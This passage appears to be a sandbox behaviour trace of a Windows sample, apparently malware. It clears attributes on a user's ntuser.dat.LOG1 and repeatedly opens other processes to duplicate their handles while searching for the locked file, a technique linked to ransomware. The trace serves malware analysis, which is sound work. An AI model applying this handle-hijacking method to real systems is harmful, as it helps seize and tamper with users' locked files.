(_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x21 [0151.356] wcscpy (in: _Dest=0x44a00a4, _Source="ntuser.dat.LOG1" | out: _Dest="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0151.356] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x80) returned 1 [0151.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.357] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x62c [0151.357] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x400) returned 0x4e4170 [0151.357] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x4e4170, Length=0x400, ResultLength=0x3fed80 | out: SystemInformation=0x4e4170, ResultLength=0x3fed80*=0x280c4) returned 0xc0000004 [0151.359] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4e4170, Size=0x280c4) returned 0x44b0068 [0151.360] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x44b0068, Length=0x280c4, ResultLength=0x3fed80 | out: SystemInformation=0x44b0068, ResultLength=0x3fed80*=0x280c4) returned 0x0 [0151.370] GetCurrentProcessId () returned 0x6fc [0151.370] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0151.371] CloseHandle (hObject=0x62c) returned 1 [0151.371] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x400) returned 0x4e4170 [0151.371] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x4e4170, Length=0x400, ResultLength=0x3fedc0 | out: SystemInformation=0x4e4170, ResultLength=0x3fedc0*=0x280b4) returned 0xc0000004 [0151.371] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4e4170, Size=0x280b4) returned 0x44b0068 [0151.372] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x44b0068, Length=0x280b4, ResultLength=0x3fedc0 | out: SystemInformation=0x44b0068, ResultLength=0x3fedc0*=0x280b4) returned 0x0 [0151.376] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x10000) returned 0x44d8128 [0151.376] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0151.376] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.398] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.401] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.401] CloseHandle (hObject=0x670) returned 1 [0151.401] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0151.401] CloseHandle (hObject=0x680) returned 1 [0151.402] CloseHandle (hObject=0x62c) returned 1 [0151.402] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0151.402] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.402] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.404] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.404] CloseHandle (hObject=0x670) returned 1 [0151.404] CloseHandle (hObject=0x680) returned 1 [0151.404] CloseHandle (hObject=0x62c) returned 1 [0151.404] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0151.404] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.405] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.406] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.406] CloseHandle (hObject=0x670) returned 1 [0151.406] CloseHandle (hObject=0x680) returned 1 [0151.406] CloseHandle (hObject=0x62c) returned 1 [0151.406] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0151.406] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.407] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.408] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.408] CloseHandle (hObject=0x670) returned 1 [0151.408] CloseHandle (hObject=0x680) returned 1 [0151.408] CloseHandle (hObject=0x62c) returned 1 [0151.408] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0151.408] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x18, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.409] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.410] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.410] CloseHandle (hObject=0x670) returned 1 [0151.410] CloseHandle (hObject=0x680) returned 1 [0151.410] CloseHandle (hObject=0x62c) returned 1 [0151.410] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0151.411] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.411] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.412] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.412] CloseHandle (hObject=0x670) returned 1 [0151.412] CloseHandle (hObject=0x680) returned 1 [0151.412] CloseHandle (hObject=0x62c) returned 1 [0151.412] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0151.412] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.412] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.413] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.414] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.414] CloseHandle (hObject=0x670) returned 1 [0151.414] CloseHandle (hObject=0x680) returned 1 [0151.414] CloseHandle (hObject=0x62c) returned 1 [0151.414] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0151.414] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x24, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.415] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.416] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.416] CloseHandle (hObject=0x670) returned 1 [0151.416] CloseHandle (hObject=0x680) returned 1 [0151.416] CloseHandle (hObject=0x62c) returned 1 [0151.416] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0151.416] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x28, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.416] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.417] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.418] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.418] CloseHandle (hObject=0x670) returned 1 [0151.418] CloseHandle (hObject=0x680) returned 1 [0151.419] CloseHandle (hObject=0x62c) returned 1 [0151.419] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x62c [0151.419] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.419] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.420] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.421] CloseHandle (hObject=0x670) returned 1 [0151.421] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.421] CloseHandle (hObject=0x680) returned 1 [0151.421] CloseHandle (hObject=0x62c) returned 1 [0151.421] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x62c [0151.421] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.421] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.422] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.423] CloseHandle (hObject=0x670) returned 1 [0151.423] CloseHandle (hObject=0x680) returned 1 [0151.423] CloseHandle (hObject=0x62c) returned 1 [0151.423] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.423] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.423] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.423] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.425] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.426] CloseHandle (hObject=0x670) returned 1 [0151.426] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.426] CloseHandle (hObject=0x680) returned 1 [0151.426] CloseHandle (hObject=0x62c) returned 1 [0151.426] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.426] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.426] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.427] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.428] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.428] CloseHandle (hObject=0x670) returned 1 [0151.428] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\ntuser.dat.LOG1") returned -5 [0151.428] CloseHandle (hObject=0x680) returned 1 [0151.429] CloseHandle (hObject=0x62c) returned 1 [0151.429] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.429] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.429] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.429] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.430] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.430] CloseHandle (hObject=0x670) returned 1 [0151.430] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\ntuser.dat.LOG1") returned -5 [0151.430] CloseHandle (hObject=0x680) returned 1 [0151.431] CloseHandle (hObject=0x62c) returned 1 [0151.431] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.431] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.431] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.432] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.432] CloseHandle (hObject=0x670) returned 1 [0151.432] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\ntuser.dat.LOG1") returned -5 [0151.432] CloseHandle (hObject=0x680) returned 1 [0151.433] CloseHandle (hObject=0x62c) returned 1 [0151.433] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.433] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.434] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.435] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.435] CloseHandle (hObject=0x670) returned 1 [0151.435] CloseHandle (hObject=0x680) returned 1 [0151.435] CloseHandle (hObject=0x62c) returned 1 [0151.435] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.435] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.436] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.437] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.437] CloseHandle (hObject=0x670) returned 1 [0151.437] CloseHandle (hObject=0x680) returned 1 [0151.437] CloseHandle (hObject=0x62c) returned 1 [0151.437] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.437] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.438] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.439] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.439] CloseHandle (hObject=0x670) returned 1 [0151.439] CloseHandle (hObject=0x680) returned 1 [0151.439] CloseHandle (hObject=0x62c) returned 1 [0151.439] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.439] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.439] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.440] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.441] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.441] CloseHandle (hObject=0x670) returned 1 [0151.441] _wcsicmp (_Str1="\\CatalogChangeListener-178-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.441] CloseHandle (hObject=0x680) returned 1 [0151.441] CloseHandle (hObject=0x62c) returned 1 [0151.441] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.441] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.442] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.443] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.443] CloseHandle (hObject=0x670) returned 1 [0151.443] CloseHandle (hObject=0x680) returned 1 [0151.443] CloseHandle (hObject=0x62c) returned 1 [0151.443] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0151.443] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.444] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.445] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.445] CloseHandle (hObject=0x670) returned 1 [0151.446] CloseHandle (hObject=0x680) returned 1 [0151.446] CloseHandle (hObject=0x62c) returned 1 [0151.446] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0151.446] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.446] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.447] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.447] CloseHandle (hObject=0x670) returned 1 [0151.447] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.447] CloseHandle (hObject=0x680) returned 1 [0151.448] CloseHandle (hObject=0x62c) returned 1 [0151.448] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0151.448] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.448] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.448] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.450] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.450] CloseHandle (hObject=0x670) returned 1 [0151.450] CloseHandle (hObject=0x680) returned 1 [0151.450] CloseHandle (hObject=0x62c) returned 1 [0151.450] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0151.450] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.450] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.450] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.451] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.451] CloseHandle (hObject=0x670) returned 1 [0151.452] CloseHandle (hObject=0x680) returned 1 [0151.452] CloseHandle (hObject=0x62c) returned 1 [0151.452] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0151.452] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.453] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.454] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.454] CloseHandle (hObject=0x670) returned 1 [0151.454] CloseHandle (hObject=0x680) returned 1 [0151.454] CloseHandle (hObject=0x62c) returned 1 [0151.454] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0151.454] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.454] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.455] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.456] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.456] CloseHandle (hObject=0x670) returned 1 [0151.456] CloseHandle (hObject=0x680) returned 1 [0151.456] CloseHandle (hObject=0x62c) returned 1 [0151.456] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0151.456] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 